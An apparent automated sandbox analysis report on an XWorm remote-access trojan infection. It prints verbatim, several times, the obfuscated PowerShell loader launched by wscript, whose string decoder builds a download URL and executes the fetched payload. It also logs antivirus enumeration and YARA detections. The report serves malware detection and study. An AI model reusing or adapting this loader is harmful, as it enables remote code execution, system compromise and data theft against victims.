tTopo,hOkays S avkTCorra: Vara\Koer,FUdbrelKlippoTota pMandip Tid i OvernGymnoeOvervsGo alsStrmf.Unsa,t Ild.xDataot.dsta Rec.n-BlubbV aageaAbstilNonreuRan.feSlegf elon$Mist,Tmaraua Autox Rubia eloneMy derUnlansIncha;Forto ');Handelsmssiges (Tilsynsraads 'Behani Gra.fChalc Udfo ( sphotUdsigeKrukksWennitNy.ed-Paddop PlagavadostIngloh krue Ree eTStati:Hydro\ TobaF Semil,etstoLifesp F rmpD.spliForstnF iakeEs,ivsDk ensTer.i.Defort TechxCe trtLys.r)In ba{Srg,se Krusx,noggiMynd,ttilvi}Akti,; Kame ');$Strmpeholderens = Tilsynsraads 'G jstefornic Un thUnpawo Af r Rockw%SpatiaargolpAarempBu ked Nd aaSt,klt ScruaVictu%Va.id\ Und,Bm,llerEkspei Skama PagnrTelefbStrafeMisunrUnoblrMohamySprge.SekunM S.rdiEgnsplN kke Justi&Ell c&Lgelf rivieUnst cAdriah Likvo nage ,ape$Tactu ';Handelsmssiges (Tilsynsraads ' Nedf$NonligKoncelArts oDobb b D,oma K ynlBebyg:Be,tiPRevokr orsoTidsivMillii ,rdis SolaiTheopoRefern Promm B dleB strnAlte t ,akk=A del(grif cHexamm stild .egu Fedt/Affalc Indb Ska.e$CirkuSBal,lt TrigrroquemHjsp pSkimpe etalhSukkeo O.aclbeviddGlibnevan.urPreexeTidv.nSkrivsovers)Ricci ');Handelsmssiges (Tilsynsraads 'Optrd$skullg GruplstyrtoTrigobTriu,aArti,lStron:SkorzSPotbah .araaMonetdAlthio PlanwWidgi=Grnse$ S,inOKantav ,rane ,opcrBattamTipvou S.necRunouhA sol.Ou wrsSemicpDisa l BudsiChorttSemij(Succo$ atlaO.kytssFoodlcTuxedhS.ciaeOlavuo MumllAf.oliB,holtBaJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Briarberry.Mil && echo $"Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Coddle = 1;$Pararctalia='Su';$Pararctalia+='bstrin';$Pararctalia+='g';Function Tilsynsraads($Paradoxer){$Afprver=$Paradoxer.Length-$Coddle;For($Publikummer=5;$Publikummer -lt $Afprver;$Publikummer+=6){$Printerdefinitionerne+=$Paradoxer.$Pararctalia.Invoke( $Publikummer, $Coddle);}$Printerdefinitionerne;}function Handelsmssiges($Overimaginatively){& ($Nondiligently106) ($Overimaginatively);}$Toniskes=Tilsynsraads 'Mana,MWeddioFell,zUncomi C.pilNonbelstanga Ripo/Stakn5Forho.Mythi0 Unde Nonvo( DispW StaniEarthnU.vetdBrystoOutbiwUnives pakk Kirj.N eratTunst. Revo1Remit0tamgs.Brde.0 Rust;Tanch .onomWAntiriSansenomdri6Rip n4Lilje;M als AlloxDoxyc6Folkl4 marg;Oxa,i AmararGaskovRock,:Smile1Eleus2S.xte1recli. ,ndr0Ge.er)Henst BarbaGoutluegadsbcKindlkBumpio .lab/Capit2Vo.dt0Lenda1 She,0 Bus 0 her1Bes,y0Synge1Contr R.stiFDukkeiF.rberslingeEkspafEnteroImprexD,maj/Ureal1Lever2Polyp1 Micr. .gat0Buhko ';$Mellite=Tilsynsraads ' CranU Skams Txthe b rkrS.iff-PrenoALe.sigAlkohe VelsnMi.sitVoice ';$Overmuch=Tilsynsraads 'CurnehGemmitSievetRor.ypFr.bisE,xli:Lealn/Cara /T.ldfwTelotw E fawDamno.,orsmsKubepeTrkkrnUncubdNonlus verip SaloaInobtcAfleveSanda.Di.crc Syllo Wo,emS.ald/Bo.sepFe.rorSexbooKlapp/IntemdPhysilOu,ro/Daryltdisorbhe,vifLoadsv ,ephparr,udUfor. ';$Oscheolith=Tilsynsraads 'Sutte> Fluo ';$Nondiligently106=Tilsynsraads 'SkabeiDetrae.ligtxrub i ';$Taxaers='totemites';Handelsmssiges (Tilsynsraads 'HydroSObte.e SnostStipu-Aqua,CfoldeoSkuldn ,seut Bnd,e,aseknVerdetBlush Raps-StenrP.lotsaJern tTopo,hOkays S avkTCorra: Vara\Koer,FUdbrelKlippoTota pMandip Tid i OvernGymnoeOvervsGo alsStrmf.Unsa,t Ild.xDataot.dsta Rec.n-BlubbV aageaAbstilNonreuRan.feSlegf elon$Mist,Tmaraua Autox Rubia eloneMy derUnlansIncha;Forto ');Handelsmssiges (Tilsynsraads 'Behani Gra.fChalc Udfo ( sphotUdsigeKrukksWennitNy.ed-Paddop PlagavadostIngloh krue Ree eTStati:Hydro\ TobaF Semil,etstoLifesp F rmpD.spliForstnF iakeEs,ivsDk ensTer.i.Defort TechxCe trtLys.r)In ba{Srg,se Krusx,noggiMynd,ttilvi}Akti,; Kame ');$Strmpeholderens = Tilsynsraads 'G jstefornic Un thUnpawo Af r Rockw%SpatiaargolpAarempBu ked Nd aaSt,klt ScruaVictu%Va.id\ Und,Bm,llerEkspei Skama PagnrTelefbStrafeMisunrUnoblrMohamySprge.SekunM S.rdiEgnsplN kke Justi&Ell c&Lgelf rivieUnst cAdriah Likvo nage ,ape$Tactu ';Handelsmssiges (Tilsynsraads ' Nedf$NonligKoncelArts oDobb b D,oma K ynlBebyg:Be,tiPRevokr orsoTidsivMillii ,rdis SolaiTheopoRefern Promm B dleB strnAlte t ,akk=A del(grif cHexamm stild .egu Fedt/Affalc Indb Ska.e$CirkuSBal,lt TrigrroquemHjsp pSkimpe etalhSukkeo O.aclbeviddGlibnevan.urPreexeTidv.nSkrivsovers)Ricci ');Handelsmssiges (Tilsynsraads 'Optrd$skullg GruplstyrtoTrigobTriu,aArti,lStron:SkorzSPotbah .araaMonetdAlthio PlanwWidgi=Grnse$ S,inOKantav ,rane ,opcrBattamTipvou S.necRunouhA sol.Ou wrsSemicpDisa l BudsiChorttSemij(Succo$ atlaO.kytssFoodlcTuxedhS.ciaeOlavuo MumllAf.oliB,holtBaJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Briarberry.Mil && echo $"Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"Jump to behavior
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "$coddle = 1;$pararctalia='su';$pararctalia+='bstrin';$pararctalia+='g';function tilsynsraads($paradoxer){$afprver=$paradoxer.length-$coddle;for($publikummer=5;$publikummer -lt $afprver;$publikummer+=6){$printerdefinitionerne+=$paradoxer.$pararctalia.invoke( $publikummer, $coddle);}$printerdefinitionerne;}function handelsmssiges($overimaginatively){& ($nondiligently106) ($overimaginatively);}$toniskes=tilsynsraads 'mana,mweddiofell,zuncomi c.pilnonbelstanga ripo/stakn5forho.mythi0 unde nonvo( dispw staniearthnu.vetdbrystooutbiwunives pakk kirj.n erattunst. revo1remit0tamgs.brde.0 rust;tanch .onomwantirisansenomdri6rip n4lilje;m als alloxdoxyc6folkl4 marg;oxa,i amarargaskovrock,:smile1eleus2s.xte1recli. ,ndr0ge.er)henst barbagoutluegadsbckindlkbumpio .lab/capit2vo.dt0lenda1 she,0 bus 0 her1bes,y0synge1contr r.stifdukkeif.rberslingeekspafenteroimprexd,maj/ureal1lever2polyp1 micr. .gat0buhko ';$mellite=tilsynsraads ' cranu skams txthe b rkrs.iff-prenoale.sigalkohe velsnmi.sitvoice ';$overmuch=tilsynsraads 'curnehgemmitsievetror.ypfr.bise,xli:lealn/cara /t.ldfwtelotw e fawdamno.,orsmskubepetrkkrnuncubdnonlus verip saloainobtcaflevesanda.di.crc syllo wo,ems.ald/bo.sepfe.rorsexbooklapp/intemdphysilou,ro/daryltdisorbhe,vifloadsv ,ephparr,udufor. ';$oscheolith=tilsynsraads 'sutte> fluo ';$nondiligently106=tilsynsraads 'skabeidetrae.ligtxrub i ';$taxaers='totemites';handelsmssiges (tilsynsraads 'hydrosobte.e snoststipu-aqua,cfoldeoskuldn ,seut bnd,e,aseknverdetblush raps-stenrp.lotsajern ttopo,hokays s avktcorra: vara\koer,fudbrelklippotota pmandip tid i overngymnoeovervsgo alsstrmf.unsa,t ild.xdataot.dsta rec.n-blubbv aageaabstilnonreuran.feslegf elon$mist,tmaraua autox rubia elonemy derunlansincha;forto ');handelsmssiges (tilsynsraads 'behani gra.fchalc udfo ( sphotudsigekrukkswennitny.ed-paddop plagavadostingloh krue ree etstati:hydro\ tobaf semil,etstolifesp f rmpd.spliforstnf iakees,ivsdk enster.i.defort techxce trtlys.r)in ba{srg,se krusx,noggimynd,ttilvi}akti,; kame ');$strmpeholderens = tilsynsraads 'g jstefornic un thunpawo af r rockw%spatiaargolpaarempbu ked nd aast,klt scruavictu%va.id\ und,bm,llerekspei skama pagnrtelefbstrafemisunrunoblrmohamysprge.sekunm s.rdiegnspln kke justi&ell c&lgelf rivieunst cadriah likvo nage ,ape$tactu ';handelsmssiges (tilsynsraads ' nedf$nonligkoncelarts odobb b d,oma k ynlbebyg:be,tiprevokr orsotidsivmillii ,rdis solaitheoporefern promm b dleb strnalte t ,akk=a del(grif chexamm stild .egu fedt/affalc indb ska.e$cirkusbal,lt trigrroquemhjsp pskimpe etalhsukkeo o.aclbeviddglibnevan.urpreexetidv.nskrivsovers)ricci ');handelsmssiges (tilsynsraads 'optrd$skullg gruplstyrtotrigobtriu,aarti,lstron:skorzspotbah .araamonetdalthio planwwidgi=grnse$ s,inokantav ,rane ,opcrbattamtipvou s.necrunouha sol.ou wrssemicpdisa l budsichorttsemij(succo$ atlao.kytssfoodlctuxedhs.ciaeolavuo mumllaf.olib,holtba
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" "$coddle = 1;$pararctalia='su';$pararctalia+='bstrin';$pararctalia+='g';function tilsynsraads($paradoxer){$afprver=$paradoxer.length-$coddle;for($publikummer=5;$publikummer -lt $afprver;$publikummer+=6){$printerdefinitionerne+=$paradoxer.$pararctalia.invoke( $publikummer, $coddle);}$printerdefinitionerne;}function handelsmssiges($overimaginatively){& ($nondiligently106) ($overimaginatively);}$toniskes=tilsynsraads 'mana,mweddiofell,zuncomi c.pilnonbelstanga ripo/stakn5forho.mythi0 unde nonvo( dispw staniearthnu.vetdbrystooutbiwunives pakk kirj.n erattunst. revo1remit0tamgs.brde.0 rust;tanch .onomwantirisansenomdri6rip n4lilje;m als alloxdoxyc6folkl4 marg;oxa,i amarargaskovrock,:smile1eleus2s.xte1recli. ,ndr0ge.er)henst barbagoutluegadsbckindlkbumpio .lab/capit2vo.dt0lenda1 she,0 bus 0 her1bes,y0synge1contr r.stifdukkeif.rberslingeekspafenteroimprexd,maj/ureal1lever2polyp1 micr. .gat0buhko ';$mellite=tilsynsraads ' cranu skams txthe b rkrs.iff-prenoale.sigalkohe velsnmi.sitvoice ';$overmuch=tilsynsraads 'curnehgemmitsievetror.ypfr.bise,xli:lealn/cara /t.ldfwtelotw e fawdamno.,orsmskubepetrkkrnuncubdnonlus verip saloainobtcaflevesanda.di.crc syllo wo,ems.ald/bo.sepfe.rorsexbooklapp/intemdphysilou,ro/daryltdisorbhe,vifloadsv ,ephparr,udufor. ';$oscheolith=tilsynsraads 'sutte> fluo ';$nondiligently106=tilsynsraads 'skabeidetrae.ligtxrub i ';$taxaers='totemites';handelsmssiges (tilsynsraads 'hydrosobte.e snoststipu-aqua,cfoldeoskuldn ,seut bnd,e,aseknverdetblush raps-stenrp.lotsajern ttopo,hokays s avktcorra: vara\koer,fudbrelklippotota pmandip tid i overngymnoeovervsgo alsstrmf.unsa,t ild.xdataot.dsta rec.n-blubbv aageaabstilnonreuran.feslegf elon$mist,tmaraua autox rubia elonemy derunlansincha;forto ');handelsmssiges (tilsynsraads 'behani gra.fchalc udfo ( sphotudsigekrukkswennitny.ed-paddop plagavadostingloh krue ree etstati:hydro\ tobaf semil,etstolifesp f rmpd.spliforstnf iakees,ivsdk enster.i.defort techxce trtlys.r)in ba{srg,se krusx,noggimynd,ttilvi}akti,; kame ');$strmpeholderens = tilsynsraads 'g jstefornic un thunpawo af r rockw%spatiaargolpaarempbu ked nd aast,klt scruavictu%va.id\ und,bm,llerekspei skama pagnrtelefbstrafemisunrunoblrmohamysprge.sekunm s.rdiegnspln kke justi&ell c&lgelf rivieunst cadriah likvo nage ,ape$tactu ';handelsmssiges (tilsynsraads ' nedf$nonligkoncelarts odobb b d,oma k ynlbebyg:be,tiprevokr orsotidsivmillii ,rdis solaitheoporefern promm b dleb strnalte t ,akk=a del(grif chexamm stild .egu fedt/affalc indb ska.e$cirkusbal,lt trigrroquemhjsp pskimpe etalhsukkeo o.aclbeviddglibnevan.urpreexetidv.nskrivsovers)ricci ');handelsmssiges (tilsynsraads 'optrd$skullg gruplstyrtotrigobtriu,aarti,lstron:skorzspotbah .araamonetdalthio planwwidgi=grnse$ s,inokantav ,rane ,opcrbattamtipvou s.necrunouha sol.ou wrssemicpdisa l budsichorttsemij(succo$ atlao.kytssfoodlctuxedhs.ciaeolavuo mumllaf.olib,holtba
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "$coddle = 1;$pararctalia='su';$pararctalia+='bstrin';$pararctalia+='g';function tilsynsraads($paradoxer){$afprver=$paradoxer.length-$coddle;for($publikummer=5;$publikummer -lt $afprver;$publikummer+=6){$printerdefinitionerne+=$paradoxer.$pararctalia.invoke( $publikummer, $coddle);}$printerdefinitionerne;}function handelsmssiges($overimaginatively){& ($nondiligently106) ($overimaginatively);}$toniskes=tilsynsraads 'mana,mweddiofell,zuncomi c.pilnonbelstanga ripo/stakn5forho.mythi0 unde nonvo( dispw staniearthnu.vetdbrystooutbiwunives pakk kirj.n erattunst. revo1remit0tamgs.brde.0 rust;tanch .onomwantirisansenomdri6rip n4lilje;m als alloxdoxyc6folkl4 marg;oxa,i amarargaskovrock,:smile1eleus2s.xte1recli. ,ndr0ge.er)henst barbagoutluegadsbckindlkbumpio .lab/capit2vo.dt0lenda1 she,0 bus 0 her1bes,y0synge1contr r.stifdukkeif.rberslingeekspafenteroimprexd,maj/ureal1lever2polyp1 micr. .gat0buhko ';$mellite=tilsynsraads ' cranu skams txthe b rkrs.iff-prenoale.sigalkohe velsnmi.sitvoice ';$overmuch=tilsynsraads 'curnehgemmitsievetror.ypfr.bise,xli:lealn/cara /t.ldfwtelotw e fawdamno.,orsmskubepetrkkrnuncubdnonlus verip saloainobtcaflevesanda.di.crc syllo wo,ems.ald/bo.sepfe.rorsexbooklapp/intemdphysilou,ro/daryltdisorbhe,vifloadsv ,ephparr,udufor. ';$oscheolith=tilsynsraads 'sutte> fluo ';$nondiligently106=tilsynsraads 'skabeidetrae.ligtxrub i ';$taxaers='totemites';handelsmssiges (tilsynsraads 'hydrosobte.e snoststipu-aqua,cfoldeoskuldn ,seut bnd,e,aseknverdetblush raps-stenrp.lotsajern ttopo,hokays s avktcorra: vara\koer,fudbrelklippotota pmandip tid i overngymnoeovervsgo alsstrmf.unsa,t ild.xdataot.dsta rec.n-blubbv aageaabstilnonreuran.feslegf elon$mist,tmaraua autox rubia elonemy derunlansincha;forto ');handelsmssiges (tilsynsraads 'behani gra.fchalc udfo ( sphotudsigekrukkswennitny.ed-paddop plagavadostingloh krue ree etstati:hydro\ tobaf semil,etstolifesp f rmpd.spliforstnf iakees,ivsdk enster.i.defort techxce trtlys.r)in ba{srg,se krusx,noggimynd,ttilvi}akti,; kame ');$strmpeholderens = tilsynsraads 'g jstefornic un thunpawo af r rockw%spatiaargolpaarempbu ked nd aast,klt scruavictu%va.id\ und,bm,llerekspei skama pagnrtelefbstrafemisunrunoblrmohamysprge.sekunm s.rdiegnspln kke justi&ell c&lgelf rivieunst cadriah likvo nage ,ape$tactu ';handelsmssiges (tilsynsraads ' nedf$nonligkoncelarts odobb b d,oma k ynlbebyg:be,tiprevokr orsotidsivmillii ,rdis solaitheoporefern promm b dleb strnalte t ,akk=a del(grif chexamm stild .egu fedt/affalc indb ska.e$cirkusbal,lt trigrroquemhjsp pskimpe etalhsukkeo o.aclbeviddglibnevan.urpreexetidv.nskrivsovers)ricci ');handelsmssiges (tilsynsraads 'optrd$skullg gruplstyrtotrigobtriu,aarti,lstron:skorzspotbah .araamonetdalthio planwwidgi=grnse$ s,inokantav ,rane ,opcrbattamtipvou s.necrunouha sol.ou wrssemicpdisa l budsichorttsemij(succo$ atlao.kytssfoodlctuxedhs.ciaeolavuo mumllaf.olib,holtbaJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" "$coddle = 1;$pararctalia='su';$pararctalia+='bstrin';$pararctalia+='g';function tilsynsraads($paradoxer){$afprver=$paradoxer.length-$coddle;for($publikummer=5;$publikummer -lt $afprver;$publikummer+=6){$printerdefinitionerne+=$paradoxer.$pararctalia.invoke( $publikummer, $coddle);}$printerdefinitionerne;}function handelsmssiges($overimaginatively){& ($nondiligently106) ($overimaginatively);}$toniskes=tilsynsraads 'mana,mweddiofell,zuncomi c.pilnonbelstanga ripo/stakn5forho.mythi0 unde nonvo( dispw staniearthnu.vetdbrystooutbiwunives pakk kirj.n erattunst. revo1remit0tamgs.brde.0 rust;tanch .onomwantirisansenomdri6rip n4lilje;m als alloxdoxyc6folkl4 marg;oxa,i amarargaskovrock,:smile1eleus2s.xte1recli. ,ndr0ge.er)henst barbagoutluegadsbckindlkbumpio .lab/capit2vo.dt0lenda1 she,0 bus 0 her1bes,y0synge1contr r.stifdukkeif.rberslingeekspafenteroimprexd,maj/ureal1lever2polyp1 micr. .gat0buhko ';$mellite=tilsynsraads ' cranu skams txthe b rkrs.iff-prenoale.sigalkohe velsnmi.sitvoice ';$overmuch=tilsynsraads 'curnehgemmitsievetror.ypfr.bise,xli:lealn/cara /t.ldfwtelotw e fawdamno.,orsmskubepetrkkrnuncubdnonlus verip saloainobtcaflevesanda.di.crc syllo wo,ems.ald/bo.sepfe.rorsexbooklapp/intemdphysilou,ro/daryltdisorbhe,vifloadsv ,ephparr,udufor. ';$oscheolith=tilsynsraads 'sutte> fluo ';$nondiligently106=tilsynsraads 'skabeidetrae.ligtxrub i ';$taxaers='totemites';handelsmssiges (tilsynsraads 'hydrosobte.e snoststipu-aqua,cfoldeoskuldn ,seut bnd,e,aseknverdetblush raps-stenrp.lotsajern ttopo,hokays s avktcorra: vara\koer,fudbrelklippotota pmandip tid i overngymnoeovervsgo alsstrmf.unsa,t ild.xdataot.dsta rec.n-blubbv aageaabstilnonreuran.feslegf elon$mist,tmaraua autox rubia elonemy derunlansincha;forto ');handelsmssiges (tilsynsraads 'behani gra.fchalc udfo ( sphotudsigekrukkswennitny.ed-paddop plagavadostingloh krue ree etstati:hydro\ tobaf semil,etstolifesp f rmpd.spliforstnf iakees,ivsdk enster.i.defort techxce trtlys.r)in ba{srg,se krusx,noggimynd,ttilvi}akti,; kame ');$strmpeholderens = tilsynsraads 'g jstefornic un thunpawo af r rockw%spatiaargolpaarempbu ked nd aast,klt scruavictu%va.id\ und,bm,llerekspei skama pagnrtelefbstrafemisunrunoblrmohamysprge.sekunm s.rdiegnspln kke justi&ell c&lgelf rivieunst cadriah likvo nage ,ape$tactu ';handelsmssiges (tilsynsraads ' nedf$nonligkoncelarts odobb b d,oma k ynlbebyg:be,tiprevokr orsotidsivmillii ,rdis solaitheoporefern promm b dleb strnalte t ,akk=a del(grif chexamm stild .egu fedt/affalc indb ska.e$cirkusbal,lt trigrroquemhjsp pskimpe etalhsukkeo o.aclbeviddglibnevan.urpreexetidv.nskrivsovers)ricci ');handelsmssiges (tilsynsraads 'optrd$skullg gruplstyrtotrigobtriu,aarti,lstron:skorzspotbah .araamonetdalthio planwwidgi=grnse$ s,inokantav ,rane ,opcrbattamtipvou s.necrunouha sol.ou wrssemicpdisa l budsichorttsemij(succo$ atlao.kytssfoodlctuxedhs.ciaeolavuo mumllaf.olib,holtbaJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeQueries volume information: C:\Program Files (x86)\Windows Mail\wab.exe VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
              Source: wab.exe, 00000011.00000002.2582688527.00000000062B1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
              Source: C:\Program Files (x86)\Windows Mail\wab.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

              Stealing of Sensitive Information

              barindex
              Yara detected XWorm
              Source: Yara matchFile source: 00000011.00000002.2595172654.0000000021D41000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: wab.exe PID: 8060, type: MEMORYSTR

              Remote Access Functionality

              barindex
              Yara detected XWorm
              Source: Yara matchFile source: 00000011.00000002.2595172654.0000000021D41000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: wab.exe PID: 8060, type: MEMORYSTR

